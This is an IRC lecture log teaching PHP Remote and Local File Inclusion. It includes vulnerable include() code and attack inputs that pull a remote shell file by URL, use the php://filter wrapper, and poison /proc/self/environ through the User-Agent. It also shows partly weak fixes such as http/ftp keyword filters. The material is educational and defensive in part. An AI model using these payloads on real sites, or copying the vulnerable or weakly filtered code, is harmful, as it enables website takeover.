____ _ _ _ ___ __ _ __/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` || |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |---------------------------------------------------------------------------|___/IRC Lecture by sToRm, pSyChOmOnkee, and RoMeO[22:30] <RoMeO> alright[22:30] <RoMeO> I will start with RFI / LFI[22:31] <RoMeO> RFI stands for, Remote File Inclusions, its very risky... and agood exploiter can gain root privs by it[22:31] <RoMeO> lets take this sample vuln. code[22:31] <RoMeO> <?php $page = $_GET['p']; if(isset($p)) { include($p); } ?>[22:32] <RoMeO> any newbie to PHP, has made this mistake.. one way or another( but me ofcourse ;p )[22:32] <RoMeO> atm whats going on is, ?p= gets included in the page, a normal usewould be ?p=contactus.php for example[22:33] <RoMeO> a malicious user, would attempt to include a remote file, ?p=http://www.darkmindz.com/shell/x2300.txt?[22:34] <RoMeO> the remote file can be as simple as a 1 line shell, and from therehe can take over your website... sucks eh[22:34] <RoMeO> now to fix it[22:35] <RoMeO> some smartass people, think "oh, if we look for http or www in the$_GET['p'], we can terminate the attack!!!!111"[22:35] <RoMeO> wrong ofcourse, an attacker can use ftp://google.com[22:35] <RoMeO> or https:[22:35] <RoMeO> etc[22:35] <RoMeO> so to fix it, we can use a switch:[22:35] <RoMeO> <?php[22:35] <RoMeO> $page = $_GET['page'];[22:35] <RoMeO> switch($page) {[22:35] <RoMeO> case "despre":[22:35] <RoMeO> include("despre.php");[22:35] <RoMeO> break;[22:35] <RoMeO> case "parteneri":[22:35] <RoMeO> include("parteneri.php");[22:35] <RoMeO> break;[22:35] <RoMeO> case "contact":[22:35] <RoMeO> include("contact.php");[22:35] <RoMeO> break; }[22:35] <RoMeO> ?>[22:35] <RoMeO> what happens here is...[22:36] <RoMeO> it checks for ?page=, and then compares it with the switchvariables.. if its one of them, it would do the include, else it would just donothing[22:36] <RoMeO> you can always, do a global securing, if you dont wish to changeyour full page nav, by doing the following:[22:36] <RoMeO> <?php[22:36] <RoMeO> $page = $_GET['page'];[22:36] <RoMeO> if(preg_match('/http/i', $page) || preg_match('/ftp/i', $page))[22:36] <RoMeO> {[22:36] <RoMeO> die("Not Today");[22:36] <RoMeO> }[22:36] <RoMeO> ?>[22:37] <Sean> what about php://[22:37] <Sean> ;)[22:37] <RoMeO> sean you had to fuck with it eh

[22:37] <Sean> yup[22:37] <Sean> sorry[22:37] <RoMeO> alritght you add php tere[22:37] <RoMeO> :P[22:37] <RoMeO> anyways[22:38] <RoMeO> tell us more about php:// sean[22:38] <RoMeO> what can you do with that wrapper[22:38] <Sean> uh[22:38] <Sean> you can manage input output streams first off[22:38] <Sean> access internal resources[22:38] <RoMeO> alright, lets move to LFI then ^^[22:39] <SeXy_aka_pur3> If i have found LFI vuln., can i read files which arehosted on the same server but on different domain ? for example/home/victim/index.php?=../../ but i want 2 acess to /victim2's site. Is itpossible ?[22:39] <sToRm> any questions so far?[22:39] <RoMeO> sexy,[22:39] <RoMeO> depends on the chown of the files[22:39] <RoMeO> if[22:39] <RoMeO> apache runs on nobody[22:39] <RoMeO> and the server is not secured by sean[22:39] <RoMeO> then yes[22:39] <SeXy_aka_pur3> ok, thanks :)[22:40] <RoMeO> oh btw[22:40] <RoMeO> nvmd i wil explain this trick when we get to LFI[22:40] <RoMeO> any questions?[22:40] <RoMeO> k +m i guess[22:40] <pSyChOmOnkee> hold on romeo[22:40] <Sean>http://example.com/rfi.php?page=php://filter/resource=http://www.example.com[22:40] <RoMeO> alright[22:41] <pSyChOmOnkee> one thing to add[22:41] <RoMeO> nice sean, that was included on a challenge on a site i go to...cant beleive i missed it :|[22:41] <pSyChOmOnkee> when romeo included the shell[22:41] <Sean> lol[22:41] <pSyChOmOnkee> you may have noticed that it ended in .txt[22:41] <Sean> simple php[22:41] <Sean> <3[22:41] <pSyChOmOnkee> instead of .php[22:42] <pSyChOmOnkee> hay guise im talking[22:42] <Sean> k[22:42] <pSyChOmOnkee> this is because of this:[22:44] <sToRm> say[22:44] <sToRm> we have the code[22:44] <sToRm> <?php include($_GET['rfi']; ?>[22:44] <sToRm> we can just include[22:44] <sToRm> ?rfi=http://www.somewhere.com/shell.txt[22:44] <sToRm> but[22:44] <sToRm> most people code liek this:[22:44] <sToRm> <?php include($_GET['rfi'].'php'); ?>[22:44] <sToRm> so[22:45] <sToRm> if we were to include our shell[22:45] <sToRm> it would actually be[22:45] <sToRm> http://www.somewhere.com/shell.txt.php[22:45] <sToRm> bad[22:45] <sToRm> so[22:45] <sToRm> by adding a ?

[22:45] <sToRm> to the .txt[22:45] <sToRm> we are essentially adding .php to the get variables[22:45] <sToRm> or "commenting it out," to put it simply[22:45] <sToRm> i suppose[22:46] <sToRm> so it then becomes http://www.somewhere.com/shell.txt?.php[22:46] <sToRm> so[22:46] <sToRm> RoMeO[22:46] <sToRm> LFI pl0x[22:46] <RoMeO> LFI[22:46] <RoMeO> k[22:47] <RoMeO> alright so LFI is local file inclusions ( include fileslocally? ), basically , you can read ( or parse ) files from the local server[22:48] <RoMeO> this isnt very dangerous when it comes to your local skiddy userfor example, he would just move on, or get the /etc/passwd and post it on show offsections[22:49] <RoMeO> but, someone with half a brain, would probably upload a picture tothe server by antoher site on server.. and in that picture, there would be asimple PHP code, that wil be parsed[22:49] <RoMeO> or, someone can include the /proc/self/envrion, which are the envvariables of the current running proccess ( apache ) in this case[22:50] <RoMeO> now from there, he can exploit that by simply changing his useragent to a php shell. and it would get parsed normally[22:50] <RoMeO> how to fix LFI[22:50] <RoMeO> use the switch, as noted in RFI ^[22:50] <RoMeO> and for a global fix, before sean says anything about it[22:51] <RoMeO> we look for ".." and "/" in the $_GET vars, anything to say heresean?[22:51] <RoMeO> k[22:51] <Sean> what if it's windows.[22:51] <RoMeO> then we block \[22:51] <Sean> and what do you mean by "look"[22:51] <Sean> do you mean stop execution or strip it?[22:52] <RoMeO> as in, we preg_match the $_GET vars for those .. and /, and if wefind them, we die();[22:52] <Sean> ah[22:52] <Sean> another tip[22:52] <Sean> never[22:52] <Sean> ever[22:52] <Sean> ever[22:52] <Sean> ever[22:52] <RoMeO> we can strip it too, by str_ireplace[22:52] <Sean> strip ../[22:52] <Sean> never strip it[22:52] <Sean> because[22:52] <Sean> why not just do[22:52] <Sean> ..[22:52] <Sean> go back a directory[22:52] <RoMeO> we strip ..[22:52] <RoMeO> and /[22:52] <Sean> in example a indexer[22:53] <RoMeO> each one on its own[22:53] <Sean> :)[22:53] <sToRm> just to add, LFI-vuln code is exactly like RFI-vuln code, exceptit has a folder or a path before the variable, such as:[22:53] <sToRm> <?php include('includes/.'$_GET['rfi']); ?>[22:53] <Sean> make sure to keep all your includes in a directory too[22:53] <sToRm> questions?[22:54] <sToRm> MEH